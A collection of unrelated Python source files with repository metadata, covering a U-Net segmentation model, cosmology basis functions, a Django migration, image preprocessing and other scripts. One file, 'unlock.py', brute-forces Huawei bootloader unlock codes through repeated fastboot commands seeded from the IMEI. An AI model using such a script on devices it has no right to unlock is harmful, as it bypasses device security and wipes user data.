def get_bases(rmin, rmax, ncont=300, params=None, cosmo_base=None, redshift=0):
if params is None or cosmo_base is None:
raise ValueError("Must pass params and cosmo_base!")
nbases = len(params)+1
rcont = np.linspace(rmin, rmax, ncont)
bases = np.empty((nbases+1, ncont))
bases[0,:] = rcont
Plin = cosmology.LinearPower(cosmo_base, redshift, transfer='EisensteinHu')
CF = cosmology.correlation.CorrelationFunction(Plin)
xi_base = CF(rcont)
bases[1,:] = xi_base
cosmo_derivs = []
ds = []
for i in range(len(params)):
param = params[i]
cosmo_dict = dict(cosmo_base)
val_base = cosmo_dict[param]
dval = val_base * 0.01
val_new = val_base + dval
cosmo_dict[param] = val_new
cosmo = cosmology.Cosmology.from_dict(cosmo_dict)
Plin = cosmology.LinearPower(cosmo, redshift, transfer='EisensteinHu')
CF = cosmology.correlation.CorrelationFunction(Plin)
xi = CF(rcont)
dcosmo = partial_derivative(xi_base, xi, dval)
bases[i+2, :] = dcosmo*dval
return bases
def partial_derivative(f1, f2, dv):
df = f2-f1
deriv = df/dv
return deriv
|
[
"kstoreyfisher@gmail.com"
] |
kstoreyfisher@gmail.com
|
183c89bbdbad838815b0202aaa3b8244c0c3e0a0
|
9f748485689732d700b3fc09b5ab30113fb42b62
|
/src/_pytorch_toolbox/pytorch_toolbox/metrics/focal_loss.py
|
7a2643091c454914f8f34d77402844e0dfde86df
|
[] |
no_license
|
rawmarshmellows/atlas-human-protein-classification
|
8178d98454920c2221f933c9ca6fd29451a14369
|
af34a9a4cfe1d6cfaca5a323df92762b68afac24
|
refs/heads/master
| 2023-03-12T23:48:47.153703
| 2019-05-06T05:53:13
| 2019-05-06T05:53:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
from pytorch_toolbox.losses import FocalLoss, focal_loss
def focal_loss_metric(preds, targs, gamma=2):
loss = FocalLoss.reshape_to_batch_size_x_minus_one_and_sum_over_last_dimension(
focal_loss(preds, targs, gamma=gamma))
return loss.mean()
|
[
"kevinyihchyunlu@gmail.com"
] |
kevinyihchyunlu@gmail.com
|
d1866a3db14523626c503c07527ff173bd86f01f
|
ecf9745ec63e01090259603d638f95ba99960cfa
|
/scripts/fix_read_labels.py
|
618e574bcfa6ff335f9d10ed3c91656c03419f75
|
[] |
no_license
|
mujundi/bioinformatics-util
|
d5e90191253ec7893da67ac54a742de9f2a3bf5d
|
56c8b187941307bc4bab302b87bedca732d299ca
|
refs/heads/master
| 2022-06-11T18:46:04.113964
| 2020-05-09T07:08:12
| 2020-05-09T07:08:12
| 262,510,926
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
#!/usr/bin/env python
import sys
with open(sys.argv[1], 'r') as infile:
with open(sys.argv[2], 'w') as outfile:
for line in infile:
if line[0] == "@":
x = line.split()
outfile.write("@" + x[2] + "\n")
else:
outfile.write(line)
infile.close()
outfile.close()
|
[
"musajundi@gmail.com"
] |
musajundi@gmail.com
|
8e681924b90b6613bc689d9c2644d9d6e0d6cc26
|
d7097277f4232a6fed712f6cc93962ab1b9faf0f
|
/backend/home/migrations/0001_load_initial_data.py
|
5f46feda5305099e279ea7206a991d9d7b879937
|
[] |
no_license
|
crowdbotics-apps/damp-math-26639
|
5f61e59e81e58886e60ca26fff72752e1f2bc8ed
|
257a3502acdb2dda8199c642cc36b90d0071a209
|
refs/heads/master
| 2023-04-23T09:42:20.501952
| 2021-05-13T06:22:15
| 2021-05-13T06:22:15
| 366,954,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
from django.db import migrations
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "damp-math-26639.botics.co"
site_params = {
"name": "Damp Math",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_site),
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
2f0232b8da18ff839444f156012af2c4c401d005
|
3675330ee6d8a025d3f8647f184b5800cc0459bc
|
/UnetModel/scripts/UnetModelClass.py
|
44ee6bfdf2dd4a42c1f55e04278f8a701668f007
|
[
"MIT"
] |
permissive
|
RoyHirsch/BrainTumorSegmentation
|
b5f1122b4ebabcb912c4c358c233bf5d5bac9a52
|
671326447f77eb750a96a42e1d9b0bfca42e42ce
|
refs/heads/master
| 2020-04-08T02:03:42.171663
| 2018-11-27T08:19:59
| 2018-11-27T08:19:59
| 158,921,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,654
|
py
|
from UnetModel import *
from UnetModel.scripts.layers import *
class UnetModelClass(object):
def __init__(self, layers, num_channels, num_labels, image_size,
kernel_size, depth, pool_size, costStr, optStr, argsDict = {}):
logging.info('#### -------- NetModel object was created -------- ####\n')
self.layers = layers
self.num_channels = num_channels
self.num_labels = num_labels
self.image_size = image_size
self.kernel_size = kernel_size
self.depth = depth
self.pool_size = pool_size
self.costStr = costStr
self.optStr = optStr
self.layersTodisplay = argsDict.pop('layersTodisplay', [0])
self.isBatchNorm = argsDict.pop('isBatchNorm', False)
self.argsDict = argsDict
self.weights_dict = {}
self.convd_dict = {}
self.convu_dict = {}
self.deconv_dict = {}
self.concat_dict = {}
self.max_dict = {}
self.ndepth = 1
self.to_string()
self.logits = self._createNet()
self.predictions = tf.nn.sigmoid(self.logits)
self.loss = self._getCost()
self.optimizer = self._getOptimizer()
def to_string(self):
logging.info('NetModel object properties:')
logging.info('layers : ' + str(self.layers))
logging.info('num_channels : ' + str(self.num_channels))
logging.info('num_labels : ' + str(self.num_labels))
logging.info('image_size : ' + str(self.image_size))
logging.info('depth : ' + str(self.depth))
logging.info('pool_size : ' + str(self.pool_size))
logging.info('costStr : ' + str(self.costStr))
logging.info('optStr : ' + str(self.optStr))
for key, value in self.argsDict.items():
logging.info(str(key) + ' : ' + str(value))
logging.info('\n')
def __del__(self):
# logging.info('#### -------- UnetModel object was deleted -------- ####\n')
pass
def _createNet(self):
# To clear older graphs
tf.reset_default_graph()
# To save the defulte graph under the net class
# self.graph = tf.get_default_graph()
# with self.graph.as_default():
# placeholders for training
self.X = tf.placeholder(dtype=tf.float32, shape=[None, self.image_size, self.image_size, self.num_channels])
self.Y = tf.placeholder(dtype=tf.float32, shape=[None, self.image_size, self.image_size, self.num_labels])
self.isTrain = tf.placeholder(dtype=tf.bool, name='isTrain')
# creates weights,convolution self.layers and downs samples
for l in range(1, self.layers + 2):
if l == 1:
with tf.name_scope('convolution_Down_{}'.format(l)):
self.weights_dict['WD1_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size,
self.num_channels, self.depth])
self.weights_dict['WD2_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size, self.depth, self.depth])
self.weights_dict['b1_{}'.format(l)] = bias_variable([self.depth])
self.weights_dict['b2_{}'.format(l)] = bias_variable([self.depth])
self.convd_dict['convd1_{}'.format(l)] = conv2d(self.X, self.weights_dict['WD1_{}'.format(l)],
self.weights_dict['b1_{}'.format(l)], self.isBatchNorm, self.isTrain)
self.convd_dict['convd2_{}'.format(l)] = conv2d(self.convd_dict['convd1_{}'.format(l)],
self.weights_dict['WD2_{}'.format(l)],
self.weights_dict['b2_{}'.format(l)], self.isBatchNorm, self.isTrain)
with tf.name_scope('Max_Pool{}'.format(l)):
self.max_dict['max_{}'.format(l)] = max_pool(self.convd_dict['convd2_{}'.format(l)], 2)
else:
self.ndepth = self.ndepth * 2
with tf.name_scope('convolution_Down_{}'.format(l)):
self.weights_dict['WD1_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size,
int(self.depth * self.ndepth / 2), self.depth * self.ndepth])
self.weights_dict['WD2_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size,
self.depth * self.ndepth, self.depth * self.ndepth])
self.weights_dict['b1_{}'.format(l)] = bias_variable([self.depth * self.ndepth])
self.weights_dict['b2_{}'.format(l)] = bias_variable([self.depth * self.ndepth])
self.convd_dict['convd1_{}'.format(l)] = conv2d(self.max_dict['max_{}'.format(l - 1)],
self.weights_dict['WD1_{}'.format(l)],
self.weights_dict['b1_{}'.format(l)], self.isBatchNorm, self.isTrain)
self.convd_dict['convd2_{}'.format(l)] = conv2d(self.convd_dict['convd1_{}'.format(l)],
self.weights_dict['WD2_{}'.format(l)],
self.weights_dict['b2_{}'.format(l)], self.isBatchNorm, self.isTrain)
if l != (self.layers + 1):
with tf.name_scope('Max_Pool{}'.format(l)):
self.max_dict['max_{}'.format(l)] = max_pool(self.convd_dict['convd2_{}'.format(l)], 2)
else:
with tf.name_scope('Middle'):
self.convu_dict['convu2_{}'.format(l)] = self.convd_dict['convd2_{}'.format(l)]
# upsampling and weights
for l in range(self.layers, 0, -1):
# deconvolution
with tf.name_scope('deconvolution_{}'.format(l)):
self.weights_dict['W_{}'.format(l)] = weight_variable([2, 2,
int(self.depth * self.ndepth / 2), self.depth * self.ndepth])
self.weights_dict['b_{}'.format(l)] = bias_variable([int(self.depth * self.ndepth / 2)])
self.deconv_dict['deconv_{}'.format(l)] = deconv2d(self.convu_dict['convu2_{}'.format(l + 1)],
self.weights_dict['W_{}'.format(l)],
self.weights_dict['b_{}'.format(l)], self.pool_size)
self.concat_dict['conc_{}'.format(l)] = concat(self.convd_dict['convd2_{}'.format(l)],
self.deconv_dict['deconv_{}'.format(l)])
with tf.name_scope('convoultion_up_{}'.format(l)):
self.weights_dict['WU1_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size,
self.depth * self.ndepth, int(self.depth * self.ndepth / 2)])
self.weights_dict['WU2_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size,
int(self.depth * self.ndepth / 2), int(self.depth * self.ndepth / 2)])
self.weights_dict['b1u_{}'.format(l)] = bias_variable([int(self.depth * self.ndepth / 2)])
self.weights_dict['b2u_{}'.format(l)] = bias_variable([int(self.depth * self.ndepth / 2)])
self.convu_dict['convu1_{}'.format(l)] = conv2d(self.concat_dict['conc_{}'.format(l)],
self.weights_dict['WU1_{}'.format(l)],
self.weights_dict['b1u_{}'.format(l)], self.isBatchNorm, self.isTrain)
self.convu_dict['convu2_{}'.format(l)] = conv2d(self.convu_dict['convu1_{}'.format(l)],
self.weights_dict['WU2_{}'.format(l)],
self.weights_dict['b2u_{}'.format(l)], self.isBatchNorm, self.isTrain)
self.ndepth = int(self.ndepth / 2)
with tf.name_scope('Finel_Layer'):
Wfc = weight_variable([1, 1, self.depth, self.num_labels])
bfc = bias_variable([self.num_labels])
return tf.nn.conv2d(self.convu_dict['convu2_{}'.format(l)], Wfc, strides=[1, 1, 1, 1], padding='SAME') + bfc
def _getCost(self):
flat_logits = tf.reshape(self.logits, [-1, self.num_labels])
flat_labels = tf.reshape(self.Y, [-1, self.num_labels])
# with self.graph.as_default():
if self.costStr == "softmax":
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=flat_logits, labels=flat_labels))
elif self.costStr == "sigmoid":
if 'weightedSum' in self.argsDict.keys() and self.argsDict['weightedSum']:
loss = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(targets=self.Y, logits=self.logits ,pos_weight=self.argsDict['weightVal']))
else:
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=self.Y, logits=self.logits))
elif self.costStr == 'dice':
eps = 1e-10
flatten_predictions = tf.reshape(self.predictions, [-1, self.num_labels])
flatten_Y = tf.reshape(self.Y, [-1, self.num_labels])
intersection = tf.reduce_sum(tf.multiply(flatten_predictions, flatten_Y))
union = eps + tf.reduce_sum(flatten_predictions) + tf.reduce_sum(flatten_predictions)
loss = 1 - ((2. * intersection) / (union + eps))
elif self.costStr == 'combined':
gamma = 0.1
eps = 1e-10
flatten_predictions = tf.reshape(self.predictions, [-1, self.num_labels])
flatten_Y = tf.reshape(self.Y, [-1, self.num_labels])
intersection = tf.reduce_sum(tf.multiply(flatten_predictions, flatten_Y))
union = eps + tf.reduce_sum(flatten_predictions) + tf.reduce_sum(flatten_predictions)
diceLoss = 1 - ((2. * intersection) / (union + eps))
if 'weightedSum' in self.argsDict.keys() and self.argsDict['weightedSum']:
crossEntrophy = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(targets=self.Y, logits=self.logits,
pos_weight=self.argsDict['weightVal']))
else:
crossEntrophy = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=self.Y, logits=self.logits))
loss = crossEntrophy + gamma * diceLoss
else:
logging.info ("Error : Not defined cost function {}.".format(self.costStr))
summery_loss = tf.summary.scalar('Loss', loss)
summery_acc = tf.summary.scalar('Accuracy', tf_accuracy(self.predictions, self.Y))
summery_dice = tf.summary.scalar('Dice', tf_diceScore(self.predictions, self.Y))
self.merged = tf.summary.merge_all()
return loss
def _getOptimizer(self):
learningRate = self.argsDict.pop('learningRate', 0.01)
# with self.graph.as_default():
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
if self.optStr == 'adam':
optimizer = tf.train.AdamOptimizer(learningRate).minimize(self.loss)
elif self.optStr == 'momentum':
momentum = self.argsDict.pop("momentum", 0.2)
optimizer = tf.train.MomentumOptimizer(learning_rate=learningRate, momentum=momentum).minimize(self.loss)
else:
logging.info ("Error : Not defined optimizer.")
return optimizer
def getLogits(self):
return self.logits
def tf_diceScore(predictions, labels):
eps = 1e-10
predictions = tf.round(predictions)
intersection = tf.reduce_sum(tf.multiply(predictions, labels))
union = eps + tf.reduce_sum(predictions) + tf.reduce_sum(labels)
res = (2. * intersection) / (union + eps)
return res
def tf_accuracy(predictions, labels):
predictions = tf.round(predictions)
eq = tf.equal(predictions, labels)
res = tf.reduce_mean(tf.cast(eq, tf.float32))
return res
|
[
"roymhirsch@gmail.com"
] |
roymhirsch@gmail.com
|
b604b1845abdf19c599b7e779d700cd061ce05e6
|
13f8323d5a3179fe78015e7345fef4c61ddfe421
|
/plus.py
|
e53945fb501cc0d2dab37b94661457b8b4ac8a2f
|
[] |
no_license
|
SeongyeonOh/new
|
2d4697827a51e09db20cc5c93b3219d7b8a35e25
|
50b7fcb14294304be7e7218c306b7857942c43fe
|
refs/heads/master
| 2020-05-22T16:05:25.828330
| 2019-05-13T14:08:59
| 2019-05-13T14:08:59
| 186,422,047
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 94
|
py
|
def plus(a, b):
print("====plus====")
print("result", a + b)
print("this is plus")
|
[
"songyon95@gmail.com"
] |
songyon95@gmail.com
|
9e61862fe63317bbf7901aa72a3a8f989ab495cb
|
2b1f728f29dcab2dc6f9446c25a9f34d71135552
|
/healthcare_disease_prediction/multiLayerPerceptron/predict.py
|
5a516c996bf53f2aec6edc8e9d3fc29117f32501
|
[
"Apache-2.0"
] |
permissive
|
joneswan/certifai-reference-models
|
968bec94592b57202da01d76a5df1648dd2b2897
|
a201edc63edb0ba876eabd459cd3d7f364a99874
|
refs/heads/master
| 2020-11-23T18:34:51.740649
| 2019-12-10T07:42:22
| 2019-12-10T07:42:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 851
|
py
|
import numpy as np
import os
import pickle
import sys
from utils.encode_decode import init_model
model_name = os.getenv("MODElNAME", "diabetes_mlp")
model_ctx = {}
# entrypoint for predict daemon
def predict_diabetes_mlp(msg):
instances = msg.payload.get("instances", [])
if not model_name in model_ctx:
model_ctx[model_name] = init_model(model_name)
return predict(model_ctx, instances)
# predict code goes here
def predict(model_ctx, instances):
instances = np.array(instances, dtype=object)
instances = instances if instances.ndim == 2 else np.reshape(instances, (1, -1))
model_obj = model_ctx[model_name]
scaler = model_obj["scaler"]
if scaler:
instances = scaler.transform(instances)
predictions = model_obj["model"].predict(instances)
return {"predictions": predictions.tolist()}
|
[
"akumar@cognitivescale.com"
] |
akumar@cognitivescale.com
|
ae4bbbf1cc3997fd4d7544bf9c6a3dbf27f7066c
|
b8681049e61dd3da02ff0851a10109f0656e260a
|
/db_config/hxn_db_config.py
|
90197c8525847636aa4945e0fa91573aa60fe1bf
|
[] |
no_license
|
NSLS-II-HXN/dpc
|
a14c52839a0a589fa23a3e023b2cbfc822529610
|
da9323806bd693a847e920ca14e149b02d080906
|
refs/heads/master
| 2021-09-11T03:51:03.084718
| 2021-09-07T20:36:22
| 2021-09-07T20:36:22
| 69,591,740
| 0
| 2
| null | 2021-09-07T20:36:23
| 2016-09-29T17:36:51
|
Python
|
UTF-8
|
Python
| false
| false
| 540
|
py
|
try:
from databroker.v0 import Broker
except ModuleNotFoundError:
from databroker import Broker
from hxntools.handlers.xspress3 import Xspress3HDF5Handler
from hxntools.handlers.timepix import TimepixHDF5Handler
db = Broker.named("hxn")
# db_analysis = Broker.named('hxn_analysis')
db.reg.register_handler(Xspress3HDF5Handler.HANDLER_NAME, Xspress3HDF5Handler, overwrite=True)
db.reg.register_handler(TimepixHDF5Handler._handler_name, TimepixHDF5Handler, overwrite=True)
import hxntools.handlers
hxntools.handlers.register(db)
|
[
"gavrilov.dvs@gmail.com"
] |
gavrilov.dvs@gmail.com
|
c7133dd56eb6758b342a923c518289a067533253
|
85681ec94458b8555822763ec79e7af0892a9ae4
|
/scripts/metadata.py
|
62faad5bb06148176e4141f7bd1d1564c1f82e61
|
[] |
no_license
|
akkartik/readwarp
|
ac32079667ee8ac9be7cd5553f32607ae63df81e
|
fb03aceb892f7b62e3e4e52ce11f6252f89abbd5
|
refs/heads/master
| 2016-09-05T16:01:54.900960
| 2012-07-07T09:38:46
| 2012-07-07T09:38:46
| 37,795,282
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
import os, sys, re, traceback, time, pickle
import json
file=sys.argv[1]
var=sys.argv[2]
mdata=json.load(open(file))
print mdata[var]
|
[
"vc@akkartik.com"
] |
vc@akkartik.com
|
72b66300b925ba76ec9dbce59730ec3bd22dee6e
|
1d1217bc1dcdd13151d6650d408819fe5855e7d8
|
/btre/realtors/migrations/0001_initial.py
|
820aef27c6a5777ead56b65e0701a3f8a15054c7
|
[] |
no_license
|
maryamrahdaran/Real-Estate---Django
|
c29e6a283490bb641bc4028d093d7f56dc771690
|
b99bc2103cbc3ba00a45831344a881df8536bbeb
|
refs/heads/main
| 2023-07-04T14:39:22.959728
| 2021-07-29T17:28:33
| 2021-07-29T17:28:33
| 390,793,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 921
|
py
|
# Generated by Django 3.1.7 on 2021-03-04 20:13
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Realtor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('photo', models.ImageField(upload_to='photos/%y/%m/%d')),
('description', models.TextField(blank=True)),
('phone', models.CharField(max_length=20)),
('email', models.CharField(max_length=50)),
('is_mvp', models.BooleanField(default=False)),
('hire_date', models.DateTimeField(blank=True, default=datetime.datetime.now)),
],
),
]
|
[
"mrahdara@ucsd.edu"
] |
mrahdara@ucsd.edu
|
1815c9b5a6e628a6614d71c113b2d6c36c07cbb2
|
dd3757d77300812ccc494cc98b3359480ef5636c
|
/project_Data/Project Programs/clustering k-means & mediods/iphoneClu.py
|
ef9dcef94182515e1ed7220647b05cf3c59adb25
|
[] |
no_license
|
neerajsh2008/RProgrames
|
92f43d5407e10941092c095948a145bf93e08d46
|
8c89f165105b70e3976882ff72d3038d5554529f
|
refs/heads/master
| 2021-01-12T00:56:38.585647
| 2015-09-26T06:46:06
| 2015-09-26T06:46:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,231
|
py
|
import simplejson as json
fin=open("iphone_processed_tweets_unigram.json","r")
dataEmo=fin.read()
fin.close()
x=json.loads(dataEmo)
y=["iphone","itunes","gameinsight","iphonegame","collected","coins","gold","apple","states","united","apps","mac","music","food","harvested",
"app","ios","ipad"]
for i in y:
print i
print'========================================================================================'
count=0
for j in x:
if i in j.lower().encode("UTF-8"):
print j
print
count=count+1
if count==20:
break
print "===================================================================================="
fout=open("iphoneClu.txt","w")
for i in y:
fout.write(i)
fout.write('========================================================================================')
count=0
for j in x:
if i in j.lower():
fout.write(j+"\n")
count=count+1
if count==20:
break
fout.write("====================================================================================")
|
[
"inturi99@gmail.com"
] |
inturi99@gmail.com
|
f1258fc7049de702914eefc85c684a346fa52696
|
b0fb856c67ffbba5aff193449e4af7c678f02556
|
/gigasecond/gigasecond.py
|
11a3506f1b13b4774a7b6b40c2b8e65d32bd36e0
|
[] |
no_license
|
naufalmukhbit/exercism-py
|
fd4e4deda2166591110b11d48c6cd6cdd2f7f936
|
243cf8135e12a4099f0a0a6bbad30bbf02066730
|
refs/heads/main
| 2023-02-05T12:37:56.102161
| 2020-12-11T11:04:27
| 2020-12-11T11:04:27
| 319,959,338
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 93
|
py
|
from datetime import timedelta
def add(moment):
return moment + timedelta(seconds=10**9)
|
[
"nmukhbit@gmail.com"
] |
nmukhbit@gmail.com
|
9924dbe22dcfb30ebdab051f6ee0911e6ea2a451
|
781df0aa332a808cd9046791e6886dc8ac26ff5b
|
/jobs/refine/template/reducer_template.py
|
df4ed8a3accb717bf6dc1b284b3aa92b0b8b2ef7
|
[] |
no_license
|
BlueStalker/PyEsReduce
|
dd88ad0422f7e1f6b9b61dcfdcdb66f92dea3a9d
|
6cd345a4a3244a7e5331cc966b47b2d465cd88e5
|
refs/heads/master
| 2021-03-12T19:59:31.436081
| 2014-12-24T05:09:53
| 2014-12-24T05:09:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 992
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from collections import defaultdict
import nltk
import os
import sys
from os.path import abspath, dirname, join
from datetime import datetime, date
from decimal import Decimal
import unittest
import requests
import six
import time
# Test that __all__ is sufficient:
from pyelasticsearch import *
from pyelasticsearch.client import es_kwargs
class CLASSNAME:
job_type = 'JOBTYPE'
def reduce(self, app, items):
# Init the instance for search
es = ElasticSearch('YOUR ELASTIC SEARCH ENDPOINT')
word_freq = defaultdict(int)
for line in items:
for word, frequency in line:
word_freq[word] += frequency
# make all things in word_freq to a test index
for word in word_freq:
key = {}
key['name'] = word
key['count'] = word_freq[word]
es.index("YOUR NEW INDEX", "YOUR NEW INDEX PREFIX", key)
return word_freq
|
[
"curt@loyal3.com"
] |
curt@loyal3.com
|
e7944174ddb9418b08bba2755f4f25a1956c875d
|
dae3b0eda78265cb2316aa8fec1f3a333d9441da
|
/flops_comparison.py
|
b8fed93bc1543e1b69431b88a67da7fe118b3af8
|
[
"MIT"
] |
permissive
|
SebastianWang9/DCANet-1
|
ae26fcd81df4a31e17c0d04fb3a5679816597a45
|
7adbd1a7b59ef8a311e22ea8908d1652efd3f28c
|
refs/heads/main
| 2023-05-14T21:30:12.509093
| 2021-06-09T09:11:48
| 2021-06-09T09:11:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,492
|
py
|
import torch.nn as nn
import torch
import numpy as np
import time
from thop import profile
from thop import clever_format
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from ptsemseg.models.fusionmodel import *
from ptsemseg.models.AMTUnet import *
from ptsemseg.models.ESFNet import *
from ptsemseg.models.RCNNUNet import *
from ptsemseg.models.CasNet import *
from ptsemseg.models.BMANet import *
from ptsemseg.models.difpyramidnet import *
from ptsemseg.models.unet import *
from ptsemseg.models.SAR_unet import *
from ptsemseg.models.utils import *
from torchvision.models import *
from ptsemseg.models.ResUnet import *
from ptsemseg.models.fcn import *
from ptsemseg.models.segnet import *
from ptsemseg.models.AMTUnet import *
torch.backends.cudnn.benchmark = True
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#
model =DifPyramidNet()
# model = torch.nn.DataParallel(model_b)
input = torch.randn(1,3,224,224)
flop, para = profile(model, inputs = (input, ))
flop, para = clever_format([flop, para], "%.3f")
# print("%.2fM"%(flop/1e6), "%.2fM"%(para/1e6))
print(flop, para)
torch.cuda.set_device(0)
torch.backends.cudnn.benchmark = True
model.eval()
model = model.cuda()
input = torch.randn((1,3,512,512), device=device)
for _ in range(10):
model(input)
torch.cuda.synchronize()
torch.cuda.synchronize()
t_start = time.time()
for _ in range(500):
model(input)
torch.cuda.synchronize()
torch.cuda.synchronize()
elapsed_time = time.time() - t_start
|
[
"Huhu01495"
] |
Huhu01495
|
d55aac6e7fe17a01ac011129dcadef06d513a28e
|
af727f1a052ccd72553f8efade08fad7e0cfbe88
|
/chapter4/q10.py
|
e07ea350ff2128f696d2caadd2529053edc49111
|
[] |
no_license
|
jojotan/Think_Python_Exercises
|
711e84a31dfec98a2b236d906f3219f35a592f62
|
dd383643781fae2c1813097d0318ec23bd5ef73a
|
refs/heads/master
| 2021-02-20T12:58:21.158540
| 2020-03-08T04:22:08
| 2020-03-08T04:22:08
| 245,337,115
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 546
|
py
|
import turtle
def make_window(color,title):
w = turtle.Screen()
w.bgcolor(color)
w.title(title)
return w
def make_turtle(color, size):
t = turtle.Turtle()
t.color(color)
t.pensize(size)
t.speed(2)
return t
def make_star(t, size):
for i in range(5):
t.forward(size)
t.right(144)
w = make_window('lightgreen', 'Square')
tess = make_turtle('pink','2')
for i in range(5):
make_star(tess,100)
tess.penup()
tess.forward(350)
tess.right(144)
tess.pendown()
w.mainloop()
|
[
"tanzheyu@tans-MacBook.local"
] |
tanzheyu@tans-MacBook.local
|
1c606234500c22dab6cb271f8a8f8089902dcda2
|
410c2a1157447b8753bb7ca1aa0aa9329417c421
|
/unlock.py
|
9d74f8e49d5e5e10e1500c0815eb8df2025dfdfd
|
[
"Apache-2.0"
] |
permissive
|
maxQ05/huawei-honor-unlock-bootloader
|
3f1035fdb9ece1b0429f8820dffdac236ed808f7
|
dbd8d445cdb3e1db0001e46b924f94e089f5caff
|
refs/heads/master
| 2021-02-21T02:45:37.430857
| 2020-03-06T06:54:32
| 2020-03-06T06:54:32
| 245,349,732
| 0
| 0
|
Apache-2.0
| 2020-03-06T06:51:09
| 2020-03-06T06:51:08
| null |
UTF-8
|
Python
| false
| false
| 2,114
|
py
|
# -*- coding: utf-8 -*-
"""
SkyEmie_' 💜 https://github.com/SkyEmie
https://en.wikipedia.org/wiki/Luhn_algorithm
"""
import time
#from flashbootlib import test
import os
import math
##########################################################################################################################
def tryUnlockBootloader(checksum):
unlock = False
algoOEMcode = 1000000000000000 #base
while(unlock == False):
sdrout = str(os.system('fastboot oem unlock '+str(algoOEMcode)))
sdrout = sdrout.split(' ')
for i in sdrout:
if i == 'success':
return(algoOEMcode)
algoOEMcode = algoIncrementChecksum(algoOEMcode, checksum)
def algoIncrementChecksum(genOEMcode, checksum):
genOEMcode+=int(checksum+math.sqrt(imei)*1024)
return(genOEMcode)
def luhn_checksum(imei):
def digits_of(n):
return [int(d) for d in str(n)]
digits = digits_of(imei)
oddDigits = digits[-1::-2]
evenDigits = digits[-2::-2]
checksum = 0
checksum += sum(oddDigits)
for i in evenDigits:
checksum += sum(digits_of(i*2))
return checksum % 10
##########################################################################################################################
print('\n\n Unlock Bootloader script - By SkyEmie_\'')
print('\n\n (Please enable USB DEBBUG and OEM UNLOCK if the device isn\'t appear..)')
print(' /!\ All data will be erased /!\\\n')
input(' Press any key to detect device..\n')
os.system('adb devices')
imei = int(input('Type IMEI digit :'))
checksum = luhn_checksum(imei)
input('Press any key to reboot your device..\n')
os.system('adb reboot bootloader')
input('Press any key when your device is ready.. (This may take time, depending on your cpu/serial port)\n')
codeOEM = tryUnlockBootloader(checksum)
os.system('fastboot getvar unlocked')
os.system('fastboot reboot')
print('\n\nDevice unlock ! OEM CODE : '+codeOEM)
print('(Keep it safe)\n')
input('Press any key to exit..\n')
exit()
|
[
"noreply@github.com"
] |
maxQ05.noreply@github.com
|
4cbc9378c01a4f9a28ff8a7a46fef64fb95eeb00
|
b9dc3b984fa70012e8ca74340b471692f0a2542d
|
/model/image.py
|
df402e72282a59d63fe75c11a4839c9cf5cb5a24
|
[] |
no_license
|
Zumbalamambo/RetinaNet-Keras
|
0c1e765aba0a435ece6b68c91c5f84e8507350cc
|
80dfcfee71a5d5ba685688c62a841d60c404b26a
|
refs/heads/master
| 2020-03-15T06:13:26.119442
| 2018-04-21T21:34:21
| 2018-04-21T21:34:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,324
|
py
|
from __future__ import division
import PIL
import cv2
import keras
import numpy as np
from model.transform import change_transform_origin
def read_image_rgb(path):
image = np.asarray(PIL.Image.open(path).convert('RGB'))
return image.copy()
def read_image_bgr(path):
image = np.asarray(PIL.Image.open(path).convert('RGB'))
return image[:, :, ::-1].copy()
def preprocess_image(x):
# se serve, converte da RGB a BGR (a meno che non sia già questa la situazione)
x = x.astype(keras.backend.floatx())
if keras.backend.image_data_format() == 'channels_first':
if x.ndim == 3:
x[0, :, :] -= 103.939
x[1, :, :] -= 116.779
x[2, :, :] -= 123.68
else:
x[:, 0, :, :] -= 103.939
x[:, 1, :, :] -= 116.779
x[:, 2, :, :] -= 123.68
else:
x[..., 0] -= 103.939
x[..., 1] -= 116.779
x[..., 2] -= 123.68
return x
def adjust_transform_for_image(transform, image, relative_translation):
# corregge la trasformazione per una immagine
height, width, channels = image.shape
result = transform
# scala la traslazione con le dimensioni dell'immagine, se serve
if relative_translation:
result[0:2, 2] *= [width, height]
# muove l'origine della trasformazione nel centro dell'immagine
